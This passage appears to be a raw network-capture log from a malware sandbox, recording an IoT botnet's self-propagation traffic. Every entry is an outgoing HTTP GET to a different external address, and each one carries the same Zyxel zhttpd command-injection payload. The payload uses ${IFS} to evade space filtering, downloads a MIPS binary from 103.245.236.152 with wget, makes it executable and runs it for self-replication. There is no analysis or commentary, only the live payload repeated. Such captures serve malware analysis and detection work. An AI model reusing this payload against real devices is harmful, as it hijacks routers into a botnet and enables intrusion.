                                            Jan 14, 2024 15:50:33.309149027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2568192.168.2.233571035.40.50.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.309150934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2569192.168.2.233716276.139.186.187443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.309197903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2570192.168.2.2340228132.87.46.228443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.309230089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2571192.168.2.234255438.48.3.219443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.309248924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2572192.168.2.2338392222.22.151.0443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.309279919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2573192.168.2.2343634110.228.63.100443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.309303999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2574192.168.2.2337618113.112.35.69443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.309331894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2575192.168.2.235670297.132.31.118443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.309355974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2576192.168.2.234755853.62.43.250443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.309406996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2577192.168.2.234170450.196.240.206443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.309434891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2578192.168.2.2358966153.67.62.125443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.309456110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2579192.168.2.2358584169.93.145.231443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.309499979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2580192.168.2.2359488116.108.181.152443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.309535980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2581192.168.2.233553276.170.247.111443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.309562922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2582192.168.2.2340588138.10.71.44443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.309564114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2583192.168.2.2351498221.104.176.95443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.309597015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2584192.168.2.2333308222.126.196.252443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.309647083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2585192.168.2.233550071.21.19.83443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.309669971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2586192.168.2.23332001.162.180.133443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.309689999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2587192.168.2.2339828104.206.85.205443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.309715033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2588192.168.2.2338358161.238.2.87443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.309753895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2589192.168.2.2344816143.13.228.74443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.309765100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2590192.168.2.234217663.173.170.121443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.309798002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2591192.168.2.2334350143.47.38.159443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.309838057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2592192.168.2.2336820116.120.176.133443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.309865952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2593192.168.2.235693088.33.172.5443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.309870958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2594192.168.2.235683873.11.176.138443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.309925079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2595192.168.2.2345788107.137.108.228443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.309933901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2596192.168.2.2334918189.131.24.4443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.309982061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2597192.168.2.235657246.21.48.253443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.310014963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2598192.168.2.2344688208.84.23.86443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.310031891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2599192.168.2.2346058183.7.254.33443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.310045004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2600192.168.2.2360180134.182.100.185443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.310062885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2601192.168.2.2338928211.251.194.24443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.310062885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2602192.168.2.234592648.78.202.111443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.310108900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2603192.168.2.2344430134.1.119.17443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.310139894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2604192.168.2.2348528189.244.1.65443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.310182095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2605192.168.2.2349884147.91.78.154443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.310209036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2606192.168.2.235527423.50.118.226443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.310244083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2607192.168.2.2350334130.151.189.3443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.310266972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2608192.168.2.2341740173.108.174.115443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.310282946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2609192.168.2.2347580121.238.190.243443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.310308933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2610192.168.2.2354070161.114.44.204443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.310343981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2611192.168.2.2348300206.163.240.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.310376883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2612192.168.2.2347380203.189.23.43443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.310390949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2613192.168.2.2353824110.156.18.7443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.310451031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2614192.168.2.2343136204.39.116.154443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.310467958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2615192.168.2.2357298106.157.247.133443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.310499907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2616192.168.2.235691694.223.99.17443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.310542107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2617192.168.2.2348480174.245.55.70443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.310581923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2618192.168.2.235344214.200.10.13443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.310599089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2619192.168.2.234872291.182.24.39443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.310606956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2620192.168.2.2358952109.212.252.101443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.310679913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2621192.168.2.234874625.242.218.11443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.310681105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2622192.168.2.2360030200.111.19.76443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.310698032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2623192.168.2.235515019.119.240.106443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.310725927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2624192.168.2.2340948139.227.131.59443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.310725927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2625192.168.2.233597883.87.99.20443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.310774088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2626192.168.2.235204872.208.251.165443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.310823917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2627192.168.2.2351540115.121.132.75443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.310837984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2628192.168.2.2360018176.107.230.183443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.310870886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2629192.168.2.235495082.224.101.74443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:33.310875893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2630192.168.2.2355816217.141.121.181443
                                            TimestampBytes transferredDirectionData
